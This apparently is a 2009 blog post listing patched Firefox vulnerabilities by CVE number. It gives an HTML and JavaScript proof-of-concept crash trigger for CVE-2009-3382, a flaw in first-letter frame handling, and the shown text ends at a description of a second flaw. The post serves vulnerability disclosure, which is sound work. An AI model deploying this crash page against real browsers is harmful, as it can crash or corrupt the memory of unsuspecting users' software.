Pages

Wednesday, November 4, 2009

Mozilla Firefox: Proof-of-Concept (PoC) codes

October 27, Mozilla developers fixed several vulnerabilities in the browser engine used in Firefox and other Mozilla-based products. Vulnerabilities fixed in 3.0.15 and 3.5.4 versions.

CVE reference:
CVE-2009-1563, CVE-2009-3370, CVE-2009-3371, CVE-2009-3372, CVE-2009-3373, CVE-2009-3374, CVE-2009-3375, CVE-2009-3376, CVE-2009-3377, CVE-2009-3378, CVE-2009-3379, CVE-2009-3380, CVE-2009-3381, CVE-2009-3382, CVE-2009-3383

Complete list of Proof-of-Concept codes (crash triggers)

1. (CVE-2009-3382) CSS Frame Constructor (layout/base/nsCSSFrameConstructor.cpp) in the browser engine does not properly handle first-letter frames

PoC:
<html><head><script>
function doe2(i) {
document.getElementById('a').setAttribute('style', 'display: -moz-box; ');
document.getElementById('c').style.display= 'none';
}
setTimeout(doe2,500,0);
</script>
<style>
div::first-letter {float: right; }
</style>
</head>

<body>
<div style="width: 50px; -moz-column-count: 2;">
a
<span style="display: table-cell;"></span><div style="display: -moz-box; font-size: 43px;">
<span id="a">
<span style="display: -moz-box;">
<span id="c">m</span>
</span>
</span>
</div>

</div>
</body>
</html>

2. (CVE-2009-1563) Array indexing error in NSPR's Balloc() leads to floating point memory vulnerability